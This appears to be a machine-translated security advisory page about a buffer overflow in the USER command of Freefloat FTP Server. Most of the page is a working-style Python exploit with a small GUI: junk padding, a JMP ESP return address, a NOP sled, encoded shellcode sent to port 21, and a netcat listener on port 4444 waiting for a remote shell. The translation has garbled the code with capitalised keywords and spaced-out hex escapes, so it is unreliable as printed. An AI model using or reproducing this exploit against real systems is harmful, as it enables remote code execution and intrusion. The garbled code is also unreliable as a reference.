Release date:
Updated on:
Affected Systems:
Freefloat FTP Server
Freefloat FTP Server
Description:
--------------------------------------------------------------------------------
Bugtraq id: 56865
Freefloat FTP Server is a free software for uploading files and managing wired and wireless devices.
The Freefloat FTP Server has a buffer overflow vulnerability in parsing/processing USER commands. Attackers can exploit this vulnerability to execute arbitrary code in the context of the affected application.
<* Source: D35m0nd142
Link: http://exploitarchive.com/freefloat-ftp-server-buffer-overflow/
Http://exploitarchive.com/freefloat-ftp-server-buffer-overflow/
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
# Exploit title: FreeFloat FTP Server Remote Command Execution USER Command Buffer Overflow
# Date: 06/12/2012
# Exploit Author: D35m0nd142
# Vendorhomepage: http://www.freefoat.com
# Tested on Windows XP SP3 with Ubuntu 12.04
#! /Usr/bin/python
Import socket, sys, time, OS
Import Tkinter, tkMessageBox
OS. system ("clear ")
Def exploit ():
Target = ip. get ()
Junk = "\ x41" * 230 # Offest Number --> 230
Eip = "\ x53 \ x93 \ x37 \ x7E" #0x7e0000353 FFE4 JMP ESP
Nops = "\ x90" * 20
Payload = ("\ xb8 \ xe9 \ x78 \ x9d \ xdb \ xda \ xd2 \ xd9 \ x74 \ x24 \ xf4 \ x5e \ x2b \ xc9" +
"\ Xb1 \ x4f \ x31 \ x46 \ x14 \ x83 \ xc6 \ x04 \ x03 \ x46 \ x10 \ x0b \ x8d \ x61" +
"\ X33 \ x42 \ x6e \ x9a \ xc4 \ x34 \ xe6 \ x7f \ xf5 \ x66 \ x9c \ xf4 \ xa4 \ xb6" +
"\ Xd6 \ x59 \ x45 \ x3d \ xba \ x49 \ xde \ x33 \ x13 \ x7d \ x57 \ xf9 \ x45 \ xb0" +
"\ X68 \ xcc \ x49 \ x1e \ xaa \ x4f \ x36 \ x5d \ xff \ xaf \ x07 \ xae \ xf2 \ xae" +
"\ X40 \ xd3 \ xfd \ xe2 \ x19 \ x9f \ xac \ x12 \ x2d \ xdd \ x6c \ x13 \ xe1 \ x69" +
"\ Xcc \ x6b \ x84 \ xae \ xb9 \ xc1 \ x87 \ xfe \ x12 \ x5e \ xcf \ xe6 \ x19 \ x38" +
"\ Xf0 \ x17 \ xcd \ x5b \ xcc \ x5e \ x7a \ xaf \ xa6 \ x60 \ xaa \ xfe \ x47 \ x53" +
"\ X92 \ xac \ x79 \ x5b \ x1f \ xad \ xbe \ x5c \ xc0 \ xd8 \ xb4 \ x9e \ x7d \ xda" +
"\ X0e \ xdc \ x59 \ x6f \ x93 \ x46 \ x29 \ xd7 \ x77 \ x76 \ xfe \ x81 \ xfc \ x74" +
"\ X4b \ xc6 \ x5b \ x99 \ x4a \ x0b \ xd0 \ xa5 \ xc7 \ xaa \ x37 \ x2c \ x93 \ x88" +
"\ X93 \ x74 \ x47 \ xb1 \ x82 \ xd0 \ x26 \ xce \ xd5 \ xbd \ x97 \ x6a \ x9d \ x2c" +
"\ Xc3 \ x0c \ xfc \ x38 \ x20 \ x22 \ xff \ xb8 \ x2e \ x35 \ x8c \ x8a \ xf1 \ xed" +
"\ X1a \ xa7 \ x7a \ x2b \ xdc \ xc8 \ x50 \ x8b \ x72 \ x37 \ x5b \ xeb \ x5b \ xfc" +
"\ X0f \ xbb \ xf3 \ xd5 \ x2f \ x50 \ x04 \ xd9 \ xe5 \ xf6 \ x54 \ x75 \ x56 \ xb6" +
"\ X04 \ x35 \ x06 \ x5e \ x4f \ xba \ x79 \ x7e \ x10 \ x0c \ xb9 \ xe7 \ x5b" +
"\ Xa7 \ x44 \ x78 \ x33 \ xba \ x46 \ x69 \ x98 \ x33 \ xa0 \ xe3 \ x30 \ x12 \ x7b" +
"\ X9c \ xa9 \ x3f \ xf7 \ x3d \ x35 \ xea \ x9f \ xde \ xa4 \ x71 \ x5f \ xa8 \ xd4" +
"\ X2d \ x08 \ xfd \ x2b \ x24 \ xdc \ x13 \ x15 \ x9e \ xc2 \ xe9 \ xc3 \ xd9 \ x46" +
"\ X36 \ x30 \ xe7 \ x47 \ xbb \ x0c \ xc3 \ x57 \ x05 \ x8c \ x4f \ x03 \ xd9 \ xdb" +
"\ X19 \ xfd \ x9f \ xb5 \ xeb \ x57 \ x76 \ x69 \ xa2 \ x3f \ x0f \ x41 \ x75 \ x39" +
"\ X10 \ x8c \ x03 \ xa5 \ xa1 \ x79 \ x52 \ xda \ x0e \ xee \ x52 \ xa3 \ x72 \ x8e" +
"\ X9d \ x7e \ x37 \ xbe \ xd7 \ x22 \ x1e \ x57 \ xbe \ xb7 \ x22 \ x3a \ x41 \ x62" +
"\ X60 \ x43 \ xc2 \ x86 \ x19 \ xb0 \ xda \ xe3 \ x1c \ xfc \ x5c \ x18 \ x6d \ x6d" +
"\ X09 \ x1e \ xc2 \ x8e \ x18 ")
Sock = socket. socket (socket. AF_INET, socket. SOCK_STREAM)
Try:
Sock. connect (target, 21 ))
Print "\ n [-] Sending exploit ..."
Print sock. recv (2000)
Sock. send ("USER" + junk + eip + nops + payload + "\ r \ n ")
Sock. close ()
OS. system ("nc-lvp 4444 ")
Except t:
Print "[-] Connection to" + target + "failed! \ N"
Sys. exit (0)
Root = Tkinter. Tk ()
Root. geometry ("% dx % d" % (700,375 ))
Root. title ("*** FreeFloat FTP Server Remote Code Execution USER Command Buffer Overflow ***")
Root ['bg '] = 'black'
Developer = Tkinter. Label (text = "Developed by D35m0nd142"). pack (side = 'bottom ')
Ip_answer = Tkinter. Label (text = "IP Address"). pack ()
Ip = Tkinter. StringVar ()
Ip_entry = Tkinter. Entry (textvariable = ip). pack ()
Exploit = Tkinter. Button (text = "Exploit", command = exploit). pack ()
Root. mainloop ()
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Freefloat
---------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://www.freefloat.com/
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
